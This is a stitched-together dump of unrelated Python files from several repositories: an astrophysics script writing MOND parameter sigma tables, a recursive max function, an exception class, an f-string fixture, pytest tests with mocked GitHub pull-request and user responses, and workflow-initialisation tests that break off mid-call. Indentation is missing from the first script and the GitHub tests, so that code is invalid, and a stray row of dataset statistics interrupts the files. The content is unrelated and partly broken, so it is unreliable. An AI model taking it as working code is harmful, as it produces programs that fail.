text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12632-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC12632
low=log10_a0_sol_UGC12632-stats_UGC12632.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC12632.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC12632
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12632-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12632-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC12632
low=log10_YD_sol_UGC12632-stats_UGC12632.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC12632.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC12632
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12632-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12632-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC12632
low=df2_sol_UGC12632-stats_UGC12632.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC12632.parWithName('df2').limits[i].upper- df2_sol_UGC12632
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12632-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12632-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC12632
low=Dinc_sol_UGC12632-stats_UGC12632.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC12632.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC12632
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12632-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
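The sigma tables written above all share one small CSV-like format: a header line, then one `max,s-,s+` row per sigma level (1 through 5). A minimal sketch of parsing such a table back into floats; the sample values below are made up for illustration, not real fit results:

```python
import io


def read_sigma_table(fh):
    """Skip the header line, return a list of (max, s_minus, s_plus) tuples."""
    next(fh)  # header: 'max s- s+ - rows are 1,2,3,4,5 sigmas'
    return [tuple(float(x) for x in line.split(','))
            for line in fh if line.strip()]


sample = io.StringIO(
    'max s- s+ - rows are 1,2,3,4,5 sigmas\n'
    '-9.8,0.1,0.1\n'
    '-9.8,0.2,0.2\n'
)
rows = read_sigma_table(sample)
print(rows[0])  # (-9.8, 0.1, 0.1)
```

In practice the same function works on an open file handle for any of the `*-sigmatab-*.txt` files.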

# --- Ejercicios/Maximo Recursivo/maximo.py (repo: FR98/Cuarto-Compu, license: MIT) ---
def maximo(lista):
    # Caso base: una lista de un elemento es su propio maximo.
    if len(lista) == 1:
        return lista[0]
    # Compute the tail's maximum once instead of recursing twice.
    resto = maximo(lista[1:])
    return lista[0] if lista[0] > resto else resto
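A quick usage check of the recursive helper above; the function is redefined here so the snippet runs standalone, and the list values are arbitrary:

```python
def maximo(lista):
    # Base case: a one-element list is its own maximum.
    if len(lista) == 1:
        return lista[0]
    resto = maximo(lista[1:])
    return lista[0] if lista[0] > resto else resto


print(maximo([3, 1, 4, 1, 5, 9, 2, 6]))  # 9
```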

# --- testify/errors.py (repo: bukzor/Testify, license: Apache-2.0) ---
class TestifyError(Exception): pass
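A minimal sketch of how such a base exception class is typically used: library code raises specific subclasses, and callers catch the base. The class is redefined and the subclass is hypothetical, purely for illustration:

```python
class TestifyError(Exception):
    pass


class MissingFixtureError(TestifyError):
    """Hypothetical subclass, for illustration only."""


try:
    raise MissingFixtureError('fixture not found')
except TestifyError as err:  # catching the base catches all subclasses
    caught = str(err)

print('caught:', caught)  # caught: fixture not found
```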

# --- test/integration/expected_out_single_line/percent_strings.py (repo: Inveracity/flynt, license: MIT) ---
a = 'abra'
print(f'{a!r} {a} {a!a}')
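This fixture is flynt's expected single-line f-string output. For reference, the `!r` and `!a` conversions match `repr()` and `ascii()` on the %-formatting side, which a small standalone check confirms:

```python
a = 'abra'

# f-string conversions versus their %-style / builtin equivalents.
assert f'{a!r}' == '%r' % (a,)          # !r is repr()
assert f'{a!a}' == ascii(a)             # !a is ascii()
assert f'{a!r} {a} {a!a}' == "'abra' abra 'abra'"
print('ok')
```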

# --- content-repo/get_top_contrib_test.py (repo: marcellarichmond/content-docs, license: MIT) ---
from gen_top_contrib import get_external_prs, get_contributors_users, get_github_user, create_grid
INNER_PR_RESPONSE = [{
"url": "https://api.github.com/repos/demisto/content/pulls/13801",
"id": 694456100,
"node_id": "MDExOlB1bGxSZXF1ZXN0Njk0NDU2MTAw",
"html_url": "https://github.com/demisto/content/pull/13801",
"issue_url": "https://api.github.com/repos/demisto/content/issues/13801",
"number": 13801,
"state": "closed",
"locked": False,
"title": "Test PR",
"user": {
"login": "powershelly",
"id": 87646651,
"node_id": "MDQ6VXNlcjg3NjQ2NjUx",
"avatar_url": "https://avatars.githubusercontent.com/u/testurl",
"url": "https://api.github.com/users/powershelly",
"html_url": "https://github.com/powershelly",
"received_events_url": "https://api.github.com/users/powershelly/received_events",
"type": "User",
"site_admin": False
},
"body": "## Status\r\n- [ ] In Progress\r\n- [x] Ready\r\n- [ ] In Hold - (Reason for hold)",
"created_at": "2021-07-21T14:56:40Z",
"updated_at": "2021-07-25T12:58:30Z",
"closed_at": "2021-07-25T12:58:30Z",
"merged_at": "2021-07-25T12:58:30Z",
"merge_commit_sha": "4c5ea28581b084f5ee7bb4847a2df4c2c111111d",
"assignee": {
"login": "testUser",
"id": 986532147,
"node_id": "MDQ6VXNlcjU5NDA4NzQ1",
"avatar_url": "https://avatars.githubusercontent.com/u/59408745?v=4",
"url": "https://api.github.com/users/testUser",
"html_url": "https://github.com/testUser",
"subscriptions_url": "https://api.github.com/users/testUser/subscriptions",
"organizations_url": "https://api.github.com/users/testUser/orgs",
"repos_url": "https://api.github.com/users/testUser/repos",
"type": "User",
"site_admin": False
},
"assignees": [
{
"login": "testUser",
"id": 59408745,
"node_id": "MDQ6VXNlcjU5NDA4NzQ1",
"avatar_url": "https://avatars.githubusercontent.com/u/59408745?v=4",
"gravatar_id": "",
"url": "https://api.github.com/users/testUser",
"html_url": "https://github.com/testUser",
"type": "User",
"site_admin": False
}
],
"commits_url": "https://api.github.com/repos/demisto/content/pulls/13801/commits",
"head": {
"label": "powershelly:fix_task_run_full_action_report",
"ref": "fix_task_run_full_action_report",
"sha": "df2219695109f309ac7a7cce1d84b6fd4c222222",
"user": {
"login": "powershelly",
"id": 87646651,
"node_id": "MDQ6VXNlcjg3NjQ2NjUx",
"avatar_url": "https://avatars.githubusercontent.com/u/testurl",
"url": "https://api.github.com/users/powershelly",
"html_url": "https://github.com/powershelly",
"followers_url": "https://api.github.com/users/powershelly/followers",
"type": "User",
"site_admin": False
},
"repo": {
"id": 123456789,
"node_id": "MDEwOlJlcG9zaXRvcnkzODc0Mjk1MzM=",
"name": "content",
"full_name": "powershelly/content",
"private": False,
"owner": {
"login": "powershelly",
"id": 123456,
"node_id": "MDQ6VXNlcjg3NjQ2NjUx",
"avatar_url": "https://avatars.githubusercontent.com/u/testurl",
"gravatar_id": "",
"url": "https://api.github.com/users/powershelly",
"html_url": "https://github.com/powershelly",
"type": "User",
"site_admin": False
},
"html_url": "https://github.com/powershelly/content",
"description": "Demisto is now Cortex XSOAR. Automate and orchestrate your Security "
"Operations with Cortex XSOAR's ever-growing Content Repository. "
"Pull Requests are always welcome and highly appreciated! ",
"fork": False,
"url": "https://api.github.com/repos/powershelly/content",
"forks_url": "https://api.github.com/repos/powershelly/content/forks",
"created_at": "2021-07-19T10:45:06Z",
"updated_at": "2021-07-19T10:45:07Z",
"pushed_at": "2021-07-25T12:26:44Z",
"git_url": "git://github.com/powershelly/content.git",
"ssh_url": "git@github.com:powershelly/content.git",
"clone_url": "https://github.com/powershelly/content.git",
"svn_url": "https://github.com/powershelly/content",
"homepage": "https://xsoar.pan.dev/",
"default_branch": "master"
}
},
"base": {
"label": "demisto:contrib/powershelly_fix_task_run_full_action_report",
"ref": "contrib/powershelly_fix_task_run_full_action_report",
"sha": "36f065eab202be6888a5ff208b1a47159af771be",
"user": {
"login": "demisto",
"id": 2345678,
"node_id": "MDEyOk9yZ2FuaXphdGlvbjExMDExNzY3",
"avatar_url": "https://avatars.githubusercontent.com/u/11011767?v=4",
"gravatar_id": "",
"url": "https://api.github.com/users/demisto",
"html_url": "https://github.com/demisto",
"followers_url": "https://api.github.com/users/demisto/followers",
"type": "Organization",
"site_admin": False
},
"repo": {
"id": 123456,
"node_id": "MDEwOlJlcG9zaXRvcnk2MDUyNTM5Mg==",
"name": "content",
"full_name": "demisto/content",
"private": False,
"owner": {
"login": "demisto",
"id": 1234123456,
"node_id": "MDEyOk9yZ2FuaXphdGlvbjExMDExNzY3",
"avatar_url": "https://avatars.githubusercontent.com/u/11011767?v=4",
"url": "https://api.github.com/users/demisto",
"html_url": "https://github.com/demisto",
"type": "Organization",
"site_admin": False
},
"html_url": "https://github.com/demisto/content",
"description": "Demisto is now Cortex XSOAR. Automate and orchestrate your Security Operations with "
"Cortex XSOAR's ever-growing Content Repository. "
"Pull Requests are always welcome and highly appreciated! ",
"fork": False,
"url": "https://api.github.com/repos/demisto/content",
"created_at": "2016-06-06T12:17:02Z",
"updated_at": "2021-07-25T16:13:16Z",
"pushed_at": "2021-07-25T18:59:42Z",
"homepage": "https://xsoar.pan.dev/",
"forks": 744,
"open_issues": 122,
"watchers": 661,
"default_branch": "master"
}
},
"author_association": "CONTRIBUTOR",
"merged": True,
"merged_by": {
"login": "testUser",
"id": 59408745,
"node_id": "MDQ6VXNlcjU5NDA4NzQ1",
"avatar_url": "https://avatars.githubusercontent.com/u/59408745?v=4",
"gravatar_id": "",
"url": "https://api.github.com/users/testUser",
"html_url": "https://github.com/testUser",
"type": "User",
"site_admin": False
}
}]
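
# The mock above describes a merged PR against a `contrib/...` base branch. A
# hypothetical helper (NOT the module's actual `get_external_prs`) showing how
# such responses can be reduced to inner PR numbers, with a minimal stand-in
# for the structure of INNER_PR_RESPONSE:

```python
def inner_pr_numbers(prs):
    """Collect the numbers of merged PRs whose base branch is a contrib/ branch."""
    return [pr['number'] for pr in prs
            if pr.get('merged') and pr['base']['ref'].startswith('contrib/')]


sample = [
    {'number': 13801, 'merged': True,
     'base': {'ref': 'contrib/powershelly_fix_task_run_full_action_report'}},
    {'number': 13900, 'merged': False, 'base': {'ref': 'master'}},
]
print(inner_pr_numbers(sample))  # [13801]
```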
def test_get_contrib_prs():
"""
Given:
- Mock response data - list of external prs.
When:
- running the get_contrib_prs function
Then:
- Validate that the inner pr numbers returns.
"""
mock_response = [
{
"url": "https://api.github.com/repos/demisto/content/issues/13834",
"html_url": "https://github.com/demisto/content/pull/13834",
"id": 952269617,
"node_id": "MDExOlB1bGxSZXF1ZXN0Njk2NDk4MDM3",
"number": 13834,
"title": "Test PR",
"user": {
"login": "content-bot",
"id": 55035720,
"node_id": "MDQ6VXNlcjU1MDM1NzIw",
"avatar_url": "https://avatars.githubusercontent.com/u/55035720?v=4",
"gravatar_id": "",
"url": "https://api.github.com/users/content-bot",
"html_url": "https://github.com/content-bot",
"followers_url": "https://api.github.com/users/content-bot/followers",
"following_url": "https://api.github.com/users/content-bot/following{/other_user}",
"gists_url": "https://api.github.com/users/content-bot/gists{/gist_id}",
"starred_url": "https://api.github.com/users/content-bot/starred{/owner}{/repo}",
"subscriptions_url": "https://api.github.com/users/content-bot/subscriptions",
"organizations_url": "https://api.github.com/users/content-bot/orgs",
"repos_url": "https://api.github.com/users/content-bot/repos",
"events_url": "https://api.github.com/users/content-bot/events{/privacy}",
"received_events_url": "https://api.github.com/users/content-bot/received_events",
"type": "User",
"site_admin": False
},
"state": "closed",
"locked": False,
"assignee": {
"login": "testUser",
"id": 59408745,
"node_id": "MDQ6VXNlcjU5NDA4NzQ1",
"avatar_url": "https://avatars.githubusercontent.com/u/59408745?v=4",
"gravatar_id": "",
"url": "https://api.github.com/users/testUser",
"html_url": "https://github.com/testUser",
"followers_url": "https://api.github.com/users/testUser/followers",
"following_url": "https://api.github.com/users/testUser/following{/other_user}",
"gists_url": "https://api.github.com/users/testUser/gists{/gist_id}",
"starred_url": "https://api.github.com/users/testUser/starred{/owner}{/repo}",
"subscriptions_url": "https://api.github.com/users/testUser/subscriptions",
"organizations_url": "https://api.github.com/users/testUser/orgs",
"repos_url": "https://api.github.com/users/testUser/repos",
"events_url": "https://api.github.com/users/testUser/events{/privacy}",
"received_events_url": "https://api.github.com/users/testUser/received_events",
"type": "User",
"site_admin": False
},
"assignees": [
{
"login": "testUser",
"id": 59408745,
"node_id": "MDQ6VXNlcjU5NDA4NzQ1",
"avatar_url": "https://avatars.githubusercontent.com/u/59408745?v=4",
"gravatar_id": "",
"url": "https://api.github.com/users/testUser",
"html_url": "https://github.com/testUser",
"followers_url": "https://api.github.com/users/testUser/followers",
"following_url": "https://api.github.com/users/testUser/following{/other_user}",
"gists_url": "https://api.github.com/users/testUser/gists{/gist_id}",
"starred_url": "https://api.github.com/users/testUser/starred{/owner}{/repo}",
"subscriptions_url": "https://api.github.com/users/testUser/subscriptions",
"organizations_url": "https://api.github.com/users/testUser/orgs",
"repos_url": "https://api.github.com/users/testUser/repos",
"events_url": "https://api.github.com/users/testUser/events{/privacy}",
"received_events_url": "https://api.github.com/users/testUser/received_events",
"type": "User",
"site_admin": False
}
],
"milestone": "None",
"comments": 0,
"created_at": "2021-07-25T12:59:32Z",
"updated_at": "2021-07-25T16:13:12Z",
"closed_at": "2021-07-25T16:13:11Z",
"author_association": "MEMBER",
"active_lock_reason": "None",
"draft": False,
"pull_request": {
"url": "https://api.github.com/repos/demisto/content/pulls/13834",
"html_url": "https://github.com/demisto/content/pull/13834",
"diff_url": "https://github.com/demisto/content/pull/13834.diff",
"patch_url": "https://github.com/demisto/content/pull/13834.patch"
},
"body": "## Original External PR\r\n[external pull request](https://github.com/demisto/content/pull/13801)"
"\r\n\r\n## Status\r\n- [ ] In Progress\r\n- [x] Ready\r\n- [ ] In Hold - (Reason for hold)\r\n\r\n"
},
{
"url": "https://api.github.com/repos/demisto/content/issues/13829",
"repository_url": "https://api.github.com/repos/demisto/content",
"labels_url": "https://api.github.com/repos/demisto/content/issues/13829/labels{/name}",
"comments_url": "https://api.github.com/repos/demisto/content/issues/13829/comments",
"events_url": "https://api.github.com/repos/demisto/content/issues/13829/events",
"html_url": "https://github.com/demisto/content/pull/13829",
"id": 952208287,
"node_id": "MDExOlB1bGxSZXF1ZXN0Njk2NDUxMTE1",
"number": 13829,
"title": "Another test PR",
"user": {
"login": "content-bot",
"id": 55035720,
"node_id": "MDQ6VXNlcjU1MDM1NzIw",
"avatar_url": "https://avatars.githubusercontent.com/u/55035720?v=4",
"gravatar_id": "",
"url": "https://api.github.com/users/content-bot",
"html_url": "https://github.com/content-bot",
"followers_url": "https://api.github.com/users/content-bot/followers",
"following_url": "https://api.github.com/users/content-bot/following{/other_user}",
"gists_url": "https://api.github.com/users/content-bot/gists{/gist_id}",
"starred_url": "https://api.github.com/users/content-bot/starred{/owner}{/repo}",
"subscriptions_url": "https://api.github.com/users/content-bot/subscriptions",
"organizations_url": "https://api.github.com/users/content-bot/orgs",
"repos_url": "https://api.github.com/users/content-bot/repos",
"events_url": "https://api.github.com/users/content-bot/events{/privacy}",
"received_events_url": "https://api.github.com/users/content-bot/received_events",
"type": "User",
"site_admin": False
},
"state": "closed",
"locked": False,
"assignee": {
"login": "TestUser",
"id": 70005542,
"node_id": "MDQ6VXNlcjcwMDA1NTQy",
"avatar_url": "https://avatars.githubusercontent.com/u/70005542?v=4",
"gravatar_id": "",
"url": "https://api.github.com/users/TestUser",
"html_url": "https://github.com/TestUser",
"followers_url": "https://api.github.com/users/TestUser/followers",
"following_url": "https://api.github.com/users/TestUser/following{/other_user}",
"gists_url": "https://api.github.com/users/TestUser/gists{/gist_id}",
"starred_url": "https://api.github.com/users/TestUser/starred{/owner}{/repo}",
"subscriptions_url": "https://api.github.com/users/TestUser/subscriptions",
"organizations_url": "https://api.github.com/users/TestUser/orgs",
"repos_url": "https://api.github.com/users/TestUser/repos",
"events_url": "https://api.github.com/users/TestUser/events{/privacy}",
"received_events_url": "https://api.github.com/users/TestUser/received_events",
"type": "User",
"site_admin": False
},
"assignees": [
{
"login": "TestUser",
"id": 70005542,
"node_id": "MDQ6VXNlcjcwMDA1NTQy",
"avatar_url": "https://avatars.githubusercontent.com/u/70005542?v=4",
"gravatar_id": "",
"url": "https://api.github.com/users/TestUser",
"html_url": "https://github.com/TestUser",
"followers_url": "https://api.github.com/users/TestUser/followers",
"following_url": "https://api.github.com/users/TestUser/following{/other_user}",
"gists_url": "https://api.github.com/users/TestUser/gists{/gist_id}",
"starred_url": "https://api.github.com/users/TestUser/starred{/owner}{/repo}",
"subscriptions_url": "https://api.github.com/users/TestUser/subscriptions",
"organizations_url": "https://api.github.com/users/TestUser/orgs",
"repos_url": "https://api.github.com/users/TestUser/repos",
"events_url": "https://api.github.com/users/TestUser/events{/privacy}",
"received_events_url": "https://api.github.com/users/TestUser/received_events",
"type": "User",
"site_admin": False
}
],
"milestone": "None",
"comments": 0,
"created_at": "2021-07-25T06:31:57Z",
"updated_at": "2021-07-25T12:19:42Z",
"closed_at": "2021-07-25T12:19:42Z",
"author_association": "MEMBER",
"active_lock_reason": "None",
"draft": False,
"pull_request": {
"url": "https://api.github.com/repos/demisto/content/pulls/13829",
"html_url": "https://github.com/demisto/content/pull/13829",
"diff_url": "https://github.com/demisto/content/pull/13829.diff",
"patch_url": "https://github.com/demisto/content/pull/13829.patch"
},
"body": "## Original External PR\r\n[external pull request](https://github.com/demisto/content/pull/13614)"
"\r\n\r\n## Contributing to Cortex XSOAR Content",
}
]
res = get_external_prs(mock_response)
expected_output = [{'pr_number': '13801',
'pr_body': '## Original External PR\r\n[external pull request]'
'(https://github.com/demisto/content/pull/13801)\r\n\r\n## Status\r\n- [ ] In '
'Progress\r\n- [x] Ready\r\n- [ ] In Hold - (Reason for hold)\r\n\r\n'},
{'pr_number': '13614', 'pr_body': '## Original External PR\r\n[external pull request]'
'(https://github.com/demisto/content/pull/13614)\r\n\r\n## '
'Contributing to Cortex XSOAR Content'}]
assert expected_output == res
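The function under test, `get_external_prs`, is defined elsewhere in the module and not shown in this excerpt. Reconstructed from the assertions alone (the PR number is parsed out of the `[external pull request](.../pull/<number>)` link in each body), a minimal sketch might look like this; the real implementation may parse the body differently:

```python
import re


def get_external_prs(prs):
    # For each inner PR, pull the external PR number out of the
    # "[external pull request](.../pull/<number>)" link in its body.
    external_prs = []
    for pr in prs:
        body = pr.get("body", "")
        match = re.search(r"\[external pull request\]\([^)]*/pull/(\d+)\)", body)
        if match:
            external_prs.append({"pr_number": match.group(1), "pr_body": body})
    return external_prs
```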
def test_get_github_user(requests_mock):
"""
Given:
- http response from get_user call to github.
When:
- running the get_github_user function
Then:
- Validate that the user's information is returned.
"""
user_response = {
"login": "jacksparow",
"id": 987654,
"node_id": "MDQ6VXNlcjQ3MTE2MzM=",
"avatar_url": "https://avatars.githubusercontent.com/u/4711633?v=4",
"url": "https://api.github.com/users/jacksparow",
"html_url": "https://github.com/jacksparow",
"followers_url": "https://api.github.com/users/jacksparow/followers",
"organizations_url": "https://api.github.com/users/jacksparow/orgs",
"repos_url": "https://api.github.com/users/jacksparow/repos",
"events_url": "https://api.github.com/users/jacksparow/events{/privacy}",
"received_events_url": "https://api.github.com/users/jacksparow/received_events",
"type": "User",
"site_admin": False,
"name": "Jack Sparow",
"location": "Tel Aviv, Israel",
"hireable": True,
"bio": "Hello World️",
"public_repos": 70,
"followers": 16,
"following": 12,
"created_at": "2013-06-16T15:42:41Z",
"updated_at": "2021-07-17T20:25:39Z"
}
username = 'jacksparow'
requests_mock.get(f'https://api.github.com/users/{username}', json=user_response)
res = get_github_user(username)
assert user_response == res
def test_get_contribution_users():
"""
Given:
- Mock response data - inner PR response.
When:
- running the get_contributors_users function
Then:
- Validate that the contributor's HTML card is returned as expected.
"""
user_info = [{
"login": "powershelly",
"id": 87646651,
"node_id": "MDQ6VXNlcjg3NjQ2NjUx",
"avatar_url": "https://avatars.githubusercontent.com/u/testurl",
"url": "https://api.github.com/users/powershelly",
"html_url": "https://github.com/powershelly",
"received_events_url": "https://api.github.com/users/powershelly/received_events",
"type": "User",
"site_admin": False
}]
res = get_contributors_users(user_info)
assert ["<img src='https://avatars.githubusercontent.com/u/testurl'/><br></br> "
"<a href='https://github.com/powershelly' target='_blank'>powershelly</a><br></br>1 Contributions"] == res
def test_create_grid():
"""
Given:
- List of users as data to create the table from.
When:
- running the create_grid function
Then:
- Validate that the table was created successfully.
"""
response = [
"<img src='https://avatars.githubusercontent.com/u/testurl'/><br></br> " +
"<a href='https://github.com/powershelly' target='_blank'>powershelly</a><br></br>5 Contributions",
"<img src='https://avatars.githubusercontent.com/u/jacksparow'/><br></br> " +
"<a href='https://github.com/powershelly' target='_blank'>jacksparow</a><br></br>8 Contributions"
]
res = create_grid(response)
expected = "<tr>\n<td><img src='https://avatars.githubusercontent.com/u/testurl'/><br></br> " \
"<a href='https://github.com/powershelly' target='_blank'>powershelly</a><br></br>5 Contributions </td>"
assert expected in res
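`create_grid` is also absent from the excerpt. The test only checks that one `<td>` cell (with its trailing space) appears inside a `<tr>`, so the row width used below is a guess:

```python
def create_grid(cards, columns=5):
    # Lay the contributor cards out as an HTML table, `columns` cells per
    # row; the trailing space inside each <td> matches the test's expected
    # substring. The default of 5 columns is an assumption.
    rows = []
    for i in range(0, len(cards), columns):
        cells = "".join(f"<td>{card} </td>" for card in cards[i:i + columns])
        rows.append(f"<tr>\n{cells}</tr>")
    return "\n".join(rows)
```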
| 48.481876 | 120 | 0.554358 | 2,374 | 22,738 | 5.179023 | 0.125105 | 0.091745 | 0.110451 | 0.13412 | 0.81952 | 0.788532 | 0.770557 | 0.735502 | 0.700529 | 0.66466 | 0 | 0.051168 | 0.280588 | 22,738 | 468 | 121 | 48.58547 | 0.700391 | 0.030654 | 0 | 0.589372 | 0 | 0.031401 | 0.59664 | 0.035105 | 0 | 0 | 0 | 0 | 0.009662 | 1 | 0.009662 | false | 0 | 0.002415 | 0 | 0.012077 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ae254a9a428032b76283dfc054baf7d061188d87 | 11,220 | py | Python | tests/lib/workflow/test_init.py | ChauffeurPrive/nestor-api | 364b5f034eeb929932a5a8c3f3b00d1275a7ae5b | [
"Apache-2.0"
] | 2 | 2020-08-17T09:59:03.000Z | 2020-08-17T09:59:23.000Z | tests/lib/workflow/test_init.py | ChauffeurPrive/nestor-api | 364b5f034eeb929932a5a8c3f3b00d1275a7ae5b | [
"Apache-2.0"
] | 83 | 2020-06-12T14:37:35.000Z | 2022-01-26T14:10:10.000Z | tests/lib/workflow/test_init.py | ChauffeurPrive/nestor-api | 364b5f034eeb929932a5a8c3f3b00d1275a7ae5b | [
"Apache-2.0"
] | 1 | 2020-07-02T14:33:45.000Z | 2020-07-02T14:33:45.000Z | from unittest import TestCase
from unittest.mock import MagicMock, create_autospec, patch
from github import AuthenticatedUser, Branch
from nestor_api.adapters.git.abstract_git_provider import (
AbstractGitProvider,
GitProviderError,
GitResource,
GitResourceNotFoundError,
)
from nestor_api.lib.workflow.init import (
_create_and_protect_branch,
_get_workflow_branches,
init_workflow,
)
from nestor_api.lib.workflow.typings import WorkflowInitStatus
class TestWorkflow(TestCase):
@patch("nestor_api.lib.workflow.init.Logger", autospec=True)
@patch("nestor_api.lib.workflow.init.non_blocking_clean", autospec=True)
@patch("nestor_api.lib.workflow.init.config", autospec=True)
@patch("nestor_api.lib.workflow.init._create_and_protect_branch", autospec=True)
def test_init_workflow(
self, _create_and_protect_branch_mock, config_mock, non_blocking_clean_mock, _logger_mock
):
"""Should correctly initialize all branches."""
# Mocks
config_mock.create_temporary_config_copy.return_value = "fake-path"
config_mock.get_app_config.return_value = {
"workflow": ["integration", "staging", "production"]
}
git_provider_mock = create_autospec(spec=AbstractGitProvider)
user = MagicMock(spec=AuthenticatedUser.AuthenticatedUser)
user.login = "some-user-login"
git_provider_mock.get_user_info.return_value = user
master_branch = MagicMock(spec=Branch.Branch)
master_branch.commit.sha = "5ac5ee8"
git_provider_mock.get_branch.return_value = master_branch
_create_and_protect_branch_mock.side_effect = [
{"created": (True, True), "protected": (True, True)},
{"created": (False, True), "protected": (True, True)},
{"created": (False, True), "protected": (False, True)},
]
# Test
result = init_workflow("organization", "app-1", git_provider_mock)
# Assertions
git_provider_mock.get_branch.assert_called_with("organization", "app-1", "master")
non_blocking_clean_mock.assert_called_with("fake-path")
self.assertEqual(
result,
(
WorkflowInitStatus.SUCCESS,
{
"integration": {"created": (True, True), "protected": (True, True)},
"staging": {"created": (False, True), "protected": (True, True)},
"production": {"created": (False, True), "protected": (False, True)},
},
),
)
@patch("nestor_api.lib.workflow.init.Logger", autospec=True)
@patch("nestor_api.lib.workflow.init.non_blocking_clean", autospec=True)
@patch("nestor_api.lib.workflow.init.config", autospec=True)
@patch("nestor_api.lib.workflow.init._create_and_protect_branch", autospec=True)
def test_init_workflow_without_master_branch(
self, _create_and_protect_branch_mock, config_mock, non_blocking_clean_mock, _logger_mock
):
"""Should return fail status and empty report."""
# Mocks
config_mock.create_temporary_config_copy.return_value = "fake-path"
config_mock.get_app_config.return_value = {
"workflow": ["integration", "staging", "production"]
}
git_provider_mock = create_autospec(spec=AbstractGitProvider)
user = MagicMock(spec=AuthenticatedUser.AuthenticatedUser)
user.login = "some-user-login"
git_provider_mock.get_user_info.return_value = user
git_provider_mock.get_branch.side_effect = GitResourceNotFoundError(GitResource.BRANCH)
# Test
result = init_workflow("organization", "app-1", git_provider_mock)
# Assertions
_create_and_protect_branch_mock.assert_not_called()
non_blocking_clean_mock.assert_called_with("fake-path")
self.assertEqual(
result, (WorkflowInitStatus.FAIL, {},),
)
@patch("nestor_api.lib.workflow.init.Logger", autospec=True)
@patch("nestor_api.lib.workflow.init.non_blocking_clean", autospec=True)
@patch("nestor_api.lib.workflow.init.config", autospec=True)
@patch("nestor_api.lib.workflow.init._create_and_protect_branch", autospec=True)
def test_init_workflow_failing_to_create_or_protect_branch(
self, _create_and_protect_branch_mock, config_mock, non_blocking_clean_mock, _logger_mock
):
"""Should return failed report if something goes wrong when
creating/protecting branches."""
# Mocks
config_mock.create_temporary_config_copy.return_value = "fake-path"
config_mock.get_app_config.return_value = {
"workflow": ["integration", "staging", "production"]
}
git_provider_mock = create_autospec(spec=AbstractGitProvider)
user = MagicMock(spec=AuthenticatedUser.AuthenticatedUser)
user.login = "some-user-login"
git_provider_mock.get_user_info.return_value = user
master_branch = MagicMock(spec=Branch.Branch)
master_branch.commit.sha = "5ac5ee8"
git_provider_mock.get_branch.return_value = master_branch
_create_and_protect_branch_mock.side_effect = GitProviderError("error")
# Test
result = init_workflow("organization", "app-1", git_provider_mock)
# Assertions
git_provider_mock.get_branch.assert_called_with("organization", "app-1", "master")
non_blocking_clean_mock.assert_called_with("fake-path")
self.assertEqual(
result, (WorkflowInitStatus.FAIL, {},),
)
@patch("nestor_api.lib.workflow.init.Logger", autospec=True)
@patch("nestor_api.lib.workflow.init.non_blocking_clean", autospec=True)
@patch("nestor_api.lib.workflow.init.config", autospec=True)
def test_init_workflow_without_configured_workflow(
self, config_mock, non_blocking_clean_mock, _logger_mock
):
"""Should create no branch."""
# Mocks
config_mock.create_temporary_config_copy.return_value = "fake-path"
config_mock.get_app_config.return_value = {}
git_provider_mock = create_autospec(spec=AbstractGitProvider)
# Test
result = init_workflow("organization", "app-1", git_provider_mock)
# Assertions
git_provider_mock.get_user_info.assert_not_called()
git_provider_mock.get_branch.assert_not_called()
git_provider_mock.create_branch.assert_not_called()
git_provider_mock.protect_branch.assert_not_called()
non_blocking_clean_mock.assert_called_with("fake-path")
self.assertEqual(result, (WorkflowInitStatus.SUCCESS, {}))
@patch("nestor_api.lib.workflow.init.Logger", autospec=True)
def test_create_and_protect_branch_with_non_existing_branch(self, _logger_mock):
"""Should create and protect branch."""
# Mocks
git_provider_mock = create_autospec(spec=AbstractGitProvider)
git_provider_mock.get_branch.side_effect = GitResourceNotFoundError(GitResource.BRANCH)
branch = MagicMock(spec=Branch.Branch)
branch.protected = False
git_provider_mock.create_branch.return_value = branch
# Test
result = _create_and_protect_branch(
"organization", "app-1", "staging", "5ac5ee8", "some-user-login", git_provider_mock
)
# Assertions
git_provider_mock.get_branch.assert_called_once_with("organization", "app-1", "staging")
git_provider_mock.create_branch.assert_called_once_with(
